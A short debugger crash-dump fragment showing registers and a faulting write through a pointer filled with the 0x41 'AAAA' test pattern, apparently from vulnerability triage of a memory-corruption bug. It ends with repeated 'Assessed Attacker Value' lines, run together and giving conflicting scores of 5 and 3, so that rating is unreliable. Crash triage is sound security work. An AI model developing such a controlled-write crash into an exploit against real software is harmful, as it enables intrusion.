rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 3